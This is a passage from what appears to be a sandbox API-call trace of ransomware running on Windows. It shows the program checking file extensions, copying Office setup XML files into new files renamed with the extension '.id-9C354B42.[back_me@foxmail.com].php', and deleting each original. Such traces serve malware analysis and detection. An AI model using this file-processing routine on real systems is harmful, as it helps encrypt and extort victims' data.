lpString2=".XML") returned 1 [0040.232] lstrlenW (lpString=".rar") returned 4 [0040.233] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.233] lstrlenW (lpString=".bz2") returned 4 [0040.233] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.233] lstrlenW (lpString=".7z") returned 3 [0040.233] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.233] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0040.233] lstrlenW (lpString=".dbf") returned 4 [0040.233] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.233] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0040.233] lstrlenW (lpString=".1cd") returned 4 [0040.233] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.233] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0040.233] lstrlenW (lpString=".jpg") returned 4 [0040.233] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.233] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0040.233] lstrlenW (lpString="SETUP.XML") returned 9 [0040.233] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0040.234] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=2296) returned 1 [0040.234] CloseHandle (hObject=0x1b0) returned 1 [0040.234] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml")) returned 0x20 [0040.234] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0040.234] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0040.234] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.234] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.234] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0040.238] GetLastError () returned 0x0 [0040.238] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x8f8, lpOverlapped=0x0) returned 1 [0040.239] WriteFile (in: hFile=0x1bc, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x900, lpOverlapped=0x0) returned 1 [0040.240] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.240] WriteFile (in: hFile=0x1bc, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.240] SetEndOfFile (hFile=0x1bc) returned 1 [0040.240] CloseHandle (hObject=0x1bc) returned 1 [0040.241] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.241] SetEndOfFile (hFile=0x1b0) returned 1 [0040.244] CloseHandle (hObject=0x1b0) returned 1 [0040.244] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0040.244] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml")) returned 1 [0040.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0040.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0040.245] lstrlenW (lpString=".doc") returned 4 [0040.245] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.245] lstrlenW (lpString=".docx") returned 5 [0040.245] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.245] lstrlenW (lpString=".pdf") returned 4 [0040.245] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.245] lstrlenW (lpString=".xls") returned 4 [0040.245] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.245] lstrlenW (lpString=".xlsx") returned 5 [0040.245] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.245] lstrlenW (lpString=".ppt") returned 4 [0040.245] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0040.245] lstrlenW (lpString=".zip") returned 4 [0040.245] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.245] lstrlenW (lpString=".rar") returned 4 [0040.245] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.245] lstrlenW (lpString=".bz2") returned 4 [0040.245] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.245] lstrlenW (lpString=".7z") returned 3 [0040.245] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0040.245] lstrlenW (lpString=".dbf") returned 4 [0040.245] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0040.245] lstrlenW (lpString=".1cd") returned 4 [0040.245] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0040.245] lstrlenW (lpString=".jpg") returned 4 [0040.245] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0040.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0040.246] lstrlenW (lpString=".doc") returned 4 [0040.246] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.246] lstrlenW (lpString=".docx") returned 5 [0040.246] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.246] lstrlenW (lpString=".pdf") returned 4 [0040.246] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.246] lstrlenW (lpString=".xls") returned 4 [0040.246] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.246] lstrlenW (lpString=".xlsx") returned 5 [0040.246] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.246] lstrlenW (lpString=".ppt") returned 4 [0040.246] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0040.246] lstrlenW (lpString=".zip") returned 4 [0040.246] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.246] lstrlenW (lpString=".rar") returned 4 [0040.246] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.246] lstrlenW (lpString=".bz2") returned 4 [0040.246] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.246] lstrlenW (lpString=".7z") returned 3 [0040.246] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0040.246] lstrlenW (lpString=".dbf") returned 4 [0040.246] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0040.246] lstrlenW (lpString=".1cd") returned 4 [0040.246] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0040.246] lstrlenW (lpString=".jpg") returned 4 [0040.246] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.247] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0040.247] lstrlenW (lpString="GrooveMUI.XML") returned 13 [0040.247] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0040.247] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=913) returned 1 [0040.247] CloseHandle (hObject=0x1b0) returned 1 [0040.247] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml")) returned 0x20 [0040.247] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0040.247] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0040.247] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.247] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.247] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0040.249] GetLastError () returned 0x0 [0040.249] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x391, lpOverlapped=0x0) returned 1 [0040.251] WriteFile (in: hFile=0x1bc, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x3a0, lpOverlapped=0x0) returned 1 [0040.252] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.252] WriteFile (in: hFile=0x1bc, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xee, lpOverlapped=0x0) returned 1 [0040.252] SetEndOfFile (hFile=0x1bc) returned 1 [0040.252] CloseHandle (hObject=0x1bc) returned 1 [0040.253] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.253] SetEndOfFile (hFile=0x1b0) returned 1 [0040.254] CloseHandle (hObject=0x1b0) returned 1 [0040.254] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0040.254] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml")) returned 1 [0040.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0040.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0040.254] lstrlenW (lpString=".doc") returned 4 [0040.254] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.254] lstrlenW (lpString=".docx") returned 5 [0040.254] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.254] lstrlenW (lpString=".pdf") returned 4 [0040.254] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.254] lstrlenW (lpString=".xls") returned 4 [0040.254] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.255] lstrlenW (lpString=".xlsx") returned 5 [0040.255] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.255] lstrlenW (lpString=".ppt") returned 4 [0040.255] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0040.255] lstrlenW (lpString=".zip") returned 4 [0040.255] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.255] lstrlenW (lpString=".rar") returned 4 [0040.255] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.255] lstrlenW (lpString=".bz2") returned 4 [0040.255] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.255] lstrlenW (lpString=".7z") returned 3 [0040.255] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0040.255] lstrlenW (lpString=".dbf") returned 4 [0040.255] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0040.255] lstrlenW (lpString=".1cd") returned 4 [0040.255] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0040.255] lstrlenW (lpString=".jpg") returned 4 [0040.255] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0040.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0040.255] lstrlenW (lpString=".doc") returned 4 [0040.255] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.255] lstrlenW (lpString=".docx") returned 5 [0040.255] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.255] lstrlenW (lpString=".pdf") returned 4 [0040.255] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.255] lstrlenW (lpString=".xls") returned 4 [0040.255] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.255] lstrlenW (lpString=".xlsx") returned 5 [0040.256] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.256] lstrlenW (lpString=".ppt") returned 4 [0040.256] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0040.256] lstrlenW (lpString=".zip") returned 4 [0040.256] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.256] lstrlenW (lpString=".rar") returned 4 [0040.256] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.256] lstrlenW (lpString=".bz2") returned 4 [0040.256] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.256] lstrlenW (lpString=".7z") returned 3 [0040.256] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0040.256] lstrlenW (lpString=".dbf") returned 4 [0040.256] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0040.256] lstrlenW (lpString=".1cd") returned 4 [0040.256] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0040.256] lstrlenW (lpString=".jpg") returned 4 [0040.256] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.256] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0040.256] lstrlenW (lpString="SETUP.XML") returned 9 [0040.256] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0040.609] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=1452) returned 1 [0040.609] CloseHandle (hObject=0x1a0) returned 1 [0040.609] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml")) returned 0x20 [0040.609] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0040.609] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0040.609] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.610] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.610] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0040.610] GetLastError () returned 0x0 [0040.610] ReadFile (in: hFile=0x1a0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x5ac, lpOverlapped=0x0) returned 1 [0040.611] WriteFile (in: hFile=0x198, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0040.612] ReadFile (in: hFile=0x1a0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.612] WriteFile (in: hFile=0x198, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.612] SetEndOfFile (hFile=0x198) returned 1 [0040.612] CloseHandle (hObject=0x198) returned 1 [0040.613] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.613] SetEndOfFile (hFile=0x1a0) returned 1 [0040.614] CloseHandle (hObject=0x1a0) returned 1 [0040.614] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0040.615] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml")) returned 1 [0040.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0040.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0040.615] lstrlenW (lpString=".doc") returned 4 [0040.615] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.615] lstrlenW (lpString=".docx") returned 5 [0040.615] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.615] lstrlenW (lpString=".pdf") returned 4 [0040.615] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.615] lstrlenW (lpString=".xls") returned 4 [0040.615] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.615] lstrlenW (lpString=".xlsx") returned 5 [0040.615] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.615] lstrlenW (lpString=".ppt") returned 4 [0040.615] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0040.615] lstrlenW (lpString=".zip") returned 4 [0040.615] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.615] lstrlenW (lpString=".rar") returned 4 [0040.615] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.615] lstrlenW (lpString=".bz2") returned 4 [0040.615] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.615] lstrlenW (lpString=".7z") returned 3 [0040.615] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0040.615] lstrlenW (lpString=".dbf") returned 4 [0040.615] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0040.616] lstrlenW (lpString=".1cd") returned 4 [0040.616] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0040.616] lstrlenW (lpString=".jpg") returned 4 [0040.616] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 